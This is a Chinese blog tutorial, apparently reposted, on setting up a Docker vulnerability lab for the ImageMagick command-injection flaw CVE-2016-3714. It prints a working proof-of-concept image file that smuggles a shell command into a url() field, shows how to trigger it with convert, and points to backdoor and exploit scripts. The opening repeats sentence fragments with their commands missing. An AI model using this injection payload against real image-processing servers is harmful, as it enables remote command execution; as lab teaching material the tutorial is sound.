体验ImageMagick 命令执行漏洞(CVE-2016–3714)的PoC
2016-09-09 01:06
381 查看
首先安装好
https://github.com/Medicean/VulApps
镜像地址:
https://hub.docker.com/r/medicean/vulapps/
镜像的各种Tag:
https://hub.docker.com/r/medicean/vulapps/tags/
其中,
-d 表示
-p 表示
–name=i_imagemagick_1 ,显式指定容器(Container)的名字,虽然不显式指定,docker也会帮你指定一个名字(细心的可以发现docker指定的名字还蛮有意思的:) )。
然后
显示所有的docker容器,以及它们的状态。
容器运行起来之后,使用
命令让指定的容器执行指定的命令。
这里是指定了
这个
当在容器shell里执行时
或通过物理机执行
漏洞触发。
搭建好环境之后访问
之后,查看
位于
https://docs.docker.com/engine/installation
Docker中文指南:
http://www.heblug.org/chinese_docker/userguide/dockerizing.html
docker。
环境地址
GitHub地址:https://github.com/Medicean/VulApps
镜像地址:
https://hub.docker.com/r/medicean/vulapps/
镜像的各种Tag:
https://hub.docker.com/r/medicean/vulapps/tags/
环境搭建
获取镜像
$ docker pull medicean/vulapps:i_imagemagick_1
其中,
medicean/vulapps是镜像名,后面冒号接具体的
Tag。
运行镜像
$ docker run -d -p 8000:80 --name=i_imagemagick_1 medicean/vulapps:i_imagemagick_1
run命令是
create命令和
start命令的结合。类似git的
pull命令是
fetch和
merge命令的结合。
-d 表示
daemon,作为后台守护进程运行。
-p 表示
port,
8000:80前者为默认的本地(127.0.0.1)端口,后者为镜像的端口。
–name=i_imagemagick_1 ,显式指定容器(Container)的名字,虽然不显式指定,docker也会帮你指定一个名字(细心的可以发现docker指定的名字还蛮有意思的:) )。
然后
$ docker ps -a
显示所有的docker容器,以及它们的状态。
容器运行起来之后,使用
$ docker exec i_imagemagick_1 cat /poc.png
命令让指定的容器执行指定的命令。
这里是指定了
i_imagemagick_1这个容器(也可以用它的完整Id或者前4位数字代替),打印出根目录的
poc.png文件的内容
$ cat /poc.png push graphic-context viewbox 0 0 640 480 fill 'url(https://evalbug.com/"|ls -la")' pop graphic-context
这个
/poc.png就是PoC!
当在容器shell里执行时
$ convert /poc.png 1.png
或通过物理机执行
$ docker exec i_imagemagick_1 convert /poc.png 1.png
漏洞触发。
搭建好环境之后访问
127.0.0.1:8000。这里8000映射了镜像里的80端口,用于HTTP访问具体的说明信息,文件位于
/var/www/html/index.php。
漏洞利用
后门——poc.php
进入容器的交互式shell$ docker run -t -i medicean/vulapps:i_imagemagick_1 "/bin/bash"
之后,查看
poc.php
位于
/var/www/html/poc.php
利用——poc.py
https://github.com/Medicean/VulApps/blob/master/i/imagemagick/1/poc.py附录
Docker环境搭建:https://docs.docker.com/engine/installation
Docker中文指南:
http://www.heblug.org/chinese_docker/userguide/dockerizing.html
相关文章推荐
- PHPMailer 命令执行漏洞(CVE-2016-10033)分析(含通用POC)
- 使用Coverity 检测 ImageMagick高危命令执行 (CVE-2016-3714 )0Day漏洞
- PHPMailer 命令执行漏洞(CVE-2016-10033)分析
- 【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)
- ImageMagick漏洞(cve-2016-3714)利用及修复
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- 开心网某站存在远程命令执行漏洞涉及项目源码(ImageMagick补丁绕过)
- Supervisord远程命令执行漏洞分析(CVE-2017-11610)
- ImageMagick爆高危命令执行漏洞
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- JBOSS AS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
- 深入浅析ImageMagick命令执行漏洞
- 【漏洞公告】CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
- 【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC)
- Apache Struts2 includeParams属性远程命令执行漏洞(CVE-2013-1966)
- 【漏洞公告】CVE-2017-11610:Supervisord 远程命令执行漏洞
- Struts2再爆远程命令执行漏洞![W3bSafe]Struts2-048 Poc Shell及防御修复方案抢先看!